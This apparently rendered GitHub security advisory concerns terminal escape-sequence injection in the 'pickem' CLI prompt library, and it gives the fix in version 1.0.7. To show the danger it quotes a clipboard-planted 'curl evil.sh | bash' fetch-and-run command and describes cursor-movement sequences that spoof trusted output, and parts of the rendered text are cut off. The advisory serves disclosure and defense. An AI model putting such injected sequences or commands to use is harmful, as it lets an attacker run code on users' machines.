OSV 1.4.0 · github-reviewed · 修改于 2026-08-25 23:59
发布时间
2026-08-25 23:59
GitHub 审查时间
2026-08-25 23:59
NVD 发布时间
—
源文件
advisories/github-reviewed/2026/08/GHSA-8qx3-8gm5-9cj2/GHSA-8qx3-8gm5-9cj2.json
pickem rendered item text (label, description, group, meta, name) to the terminal with no control-character sanitization. chrome.row only stripped ANSI from the active row; inactive rows, the public createFormatter, and selection-summary lines printed labels raw, and the ANSI strip missed bare C0 controls anyway.
Because item text is frequently attacker-controllable (git branch names, PR/issue titles, filenames, npm/API results), a malicious label was a terminal write primitive:
curl evil.sh | bash into the user's clipboard; their next paste-into-shell is RCE.ESC[1A, ESC[2K) — overwrite already-printed trusted lines to spoof UI (forge a "✓ Verified publisher", fake prompt, or hide a malicious entry).Any CLI that passes untrusted strings into pickem choices is affected.
Fixed in 1.0.7. A new sanitizeDisplay() strips every escape sequence except inert SGR (color), plus all C0/C1/DEL control bytes, at the render boundary — applied to every externally-supplied display string across all prompts (select, search, checkbox, searchable-checkbox, input), createFormatter, row meta, and committed selection summaries. Display-only; returned values are unchanged.
Upgrade to >= 1.0.7. Otherwise, strip C0/C1/DEL control characters and ANSI escape sequences from any untrusted text before passing it to pickem.